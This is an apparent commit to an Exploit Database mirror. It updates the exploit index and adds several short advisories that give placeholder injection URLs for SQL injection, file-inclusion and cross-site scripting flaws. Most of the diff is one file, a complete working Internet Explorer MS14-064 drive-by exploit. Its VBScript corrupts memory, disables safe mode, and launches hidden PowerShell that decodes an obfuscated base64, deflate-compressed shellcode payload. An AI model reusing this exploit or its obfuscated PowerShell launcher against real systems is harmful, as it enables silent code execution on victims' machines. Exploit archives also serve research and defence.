Updated 11_22_2014
This commit is contained in:
parent
bf592f7589
commit
ba4b116f27
6 changed files with 277 additions and 1 deletions
|
@ -31731,7 +31731,7 @@ id,file,description,date,author,platform,type,port
|
|||
35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
|
||||
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
|
||||
35229,platforms/windows/remote/35229.html,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
|
||||
35229,platforms/windows/remote/35229.html,"Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0
|
||||
35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
|
||||
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
|
||||
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
|
||||
|
@ -31800,3 +31800,8 @@ id,file,description,date,author,platform,type,port
|
|||
35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
|
||||
35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0
|
||||
35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0
|
||||
35308,platforms/windows/remote/35308.html,"Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0
|
||||
35309,platforms/php/webapps/35309.txt,"Betsy 4.0 'page' Parameter Local File Include Vulnerability",2011-02-02,MizoZ,php,webapps,0
|
||||
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
|
||||
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
|
||||
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
8
platforms/asp/webapps/35310.txt
Executable file
8
platforms/asp/webapps/35310.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/46131/info
|
||||
|
||||
Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/default.asp?pid=[SQLi]
|
||||
http://www.example.com/viewproduct.asp?PID=[SQli]
|
9
platforms/php/webapps/35309.txt
Executable file
9
platforms/php/webapps/35309.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/46124/info
|
||||
|
||||
Betsy is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
Betsy 4.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ress.php?page=[LFI]
|
17
platforms/php/webapps/35311.txt
Executable file
17
platforms/php/webapps/35311.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/46135/info
|
||||
|
||||
Octeth Oempro is prone to multiple SQL-injection vulnerabilities and an information-disclosure vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Octeth Oempro 3.6.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cli_bounce.php
|
||||
|
||||
http://www.example.com/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
|
||||
SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]
|
||||
|
||||
http://www.example.com/html_version.php?ECID=[SQL]
|
||||
|
||||
http://www.example.com/archive.php?ArchiveID=[SQL]
|
||||
|
7
platforms/php/webapps/35312.txt
Executable file
7
platforms/php/webapps/35312.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/46143/info
|
||||
|
||||
Firebook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
|
||||
|
||||
http://www.example.com/env/index.html?[xss]
|
230
platforms/windows/remote/35308.html
Executable file
230
platforms/windows/remote/35308.html
Executable file
|
@ -0,0 +1,230 @@
|
|||
<!doctype html>
|
||||
<html>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|
||||
<body>
|
||||
|
||||
<pre>
|
||||
|--------------------------------------------------------------------------|
|
||||
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
|
||||
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
|
||||
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
|
||||
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
|
||||
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|
||||
|--------------------------------------------------------------------------|
|
||||
Very nice black-magic yuange, don't think it went unnoticed that you
|
||||
have been popping shells since 2009 :D ???????????
|
||||
|--------------------------------------------------------------------------|
|
||||
</pre>
|
||||
|
||||
<SCRIPT LANGUAGE="VBScript">
|
||||
function runmumaa()
|
||||
On Error Resume Next
|
||||
set shell=createobject("Shell.Application")
|
||||
|
||||
'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
|
||||
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="
|
||||
|
||||
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
|
||||
|
||||
params="-NoP -NonI -Exec Bypass -Command " & command
|
||||
|
||||
'Original POC yuange
|
||||
'set shell=createobject("Shell.Application")
|
||||
'shell.ShellExecute "notepad.exe"
|
||||
|
||||
'With UAC
|
||||
'shell.ShellExecute "powershell", params, "", "runas", 0
|
||||
|
||||
'Without UAC
|
||||
shell.ShellExecute "powershell", params, "", "", 0
|
||||
|
||||
end function
|
||||
</script>
|
||||
|
||||
<SCRIPT LANGUAGE="VBScript">
|
||||
|
||||
dim aa()
|
||||
dim ab()
|
||||
dim a0
|
||||
dim a1
|
||||
dim a2
|
||||
dim a3
|
||||
dim win9x
|
||||
dim intVersion
|
||||
dim rnda
|
||||
dim funclass
|
||||
dim myarray
|
||||
|
||||
Begin()
|
||||
|
||||
function Begin()
|
||||
On Error Resume Next
|
||||
info=Navigator.UserAgent
|
||||
|
||||
if(instr(info,"Win64")>0) then
|
||||
exit function
|
||||
end if
|
||||
|
||||
if (instr(info,"MSIE")>0) then
|
||||
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
|
||||
else
|
||||
exit function
|
||||
|
||||
end if
|
||||
|
||||
win9x=0
|
||||
|
||||
BeginInit()
|
||||
If Create()=True Then
|
||||
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
|
||||
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
|
||||
|
||||
if(intVersion<4) then
|
||||
document.write("<br> IE")
|
||||
document.write(intVersion)
|
||||
runshellcode()
|
||||
else
|
||||
setnotsafemode()
|
||||
end if
|
||||
end if
|
||||
end function
|
||||
|
||||
function BeginInit()
|
||||
Randomize()
|
||||
redim aa(5)
|
||||
redim ab(5)
|
||||
a0=13+17*rnd(6)
|
||||
a3=7+3*rnd(5)
|
||||
end function
|
||||
|
||||
function Create()
|
||||
On Error Resume Next
|
||||
dim i
|
||||
Create=False
|
||||
For i = 0 To 400
|
||||
If Over()=True Then
|
||||
' document.write(i)
|
||||
Create=True
|
||||
Exit For
|
||||
End If
|
||||
Next
|
||||
end function
|
||||
|
||||
sub testaa()
|
||||
end sub
|
||||
|
||||
function mydata()
|
||||
On Error Resume Next
|
||||
i=testaa
|
||||
i=null
|
||||
redim Preserve aa(a2)
|
||||
|
||||
ab(0)=0
|
||||
aa(a1)=i
|
||||
ab(0)=6.36598737437801E-314
|
||||
|
||||
aa(a1+2)=myarray
|
||||
ab(2)=1.74088534731324E-310
|
||||
mydata=aa(a1)
|
||||
redim Preserve aa(a0)
|
||||
end function
|
||||
|
||||
|
||||
function setnotsafemode()
|
||||
On Error Resume Next
|
||||
i=mydata()
|
||||
i=readmemo(i+8)
|
||||
i=readmemo(i+16)
|
||||
j=readmemo(i+&h134)
|
||||
for k=0 to &h60 step 4
|
||||
j=readmemo(i+&h120+k)
|
||||
if(j=14) then
|
||||
j=0
|
||||
redim Preserve aa(a2)
|
||||
aa(a1+2)(i+&h11c+k)=ab(4)
|
||||
redim Preserve aa(a0)
|
||||
|
||||
j=0
|
||||
j=readmemo(i+&h120+k)
|
||||
|
||||
Exit for
|
||||
end if
|
||||
|
||||
next
|
||||
ab(2)=1.69759663316747E-313
|
||||
runmumaa()
|
||||
end function
|
||||
|
||||
function Over()
|
||||
On Error Resume Next
|
||||
dim type1,type2,type3
|
||||
Over=False
|
||||
a0=a0+a3
|
||||
a1=a0+2
|
||||
a2=a0+&h8000000
|
||||
|
||||
redim Preserve aa(a0)
|
||||
redim ab(a0)
|
||||
|
||||
redim Preserve aa(a2)
|
||||
|
||||
type1=1
|
||||
ab(0)=1.123456789012345678901234567890
|
||||
aa(a0)=10
|
||||
|
||||
If(IsObject(aa(a1-1)) = False) Then
|
||||
if(intVersion<4) then
|
||||
mem=cint(a0+1)*16
|
||||
j=vartype(aa(a1-1))
|
||||
if((j=mem+4) or (j*8=mem+8)) then
|
||||
if(vartype(aa(a1-1))<>0) Then
|
||||
If(IsObject(aa(a1)) = False ) Then
|
||||
type1=VarType(aa(a1))
|
||||
end if
|
||||
end if
|
||||
else
|
||||
redim Preserve aa(a0)
|
||||
exit function
|
||||
|
||||
end if
|
||||
else
|
||||
if(vartype(aa(a1-1))<>0) Then
|
||||
If(IsObject(aa(a1)) = False ) Then
|
||||
type1=VarType(aa(a1))
|
||||
end if
|
||||
end if
|
||||
end if
|
||||
end if
|
||||
|
||||
|
||||
If(type1=&h2f66) Then
|
||||
Over=True
|
||||
End If
|
||||
If(type1=&hB9AD) Then
|
||||
Over=True
|
||||
win9x=1
|
||||
End If
|
||||
|
||||
redim Preserve aa(a0)
|
||||
|
||||
end function
|
||||
|
||||
function ReadMemo(add)
|
||||
On Error Resume Next
|
||||
redim Preserve aa(a2)
|
||||
|
||||
ab(0)=0
|
||||
aa(a1)=add+4
|
||||
ab(0)=1.69759663316747E-313
|
||||
ReadMemo=lenb(aa(a1))
|
||||
|
||||
ab(0)=0
|
||||
|
||||
redim Preserve aa(a0)
|
||||
end function
|
||||
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
Loading…
Add table
Reference in a new issue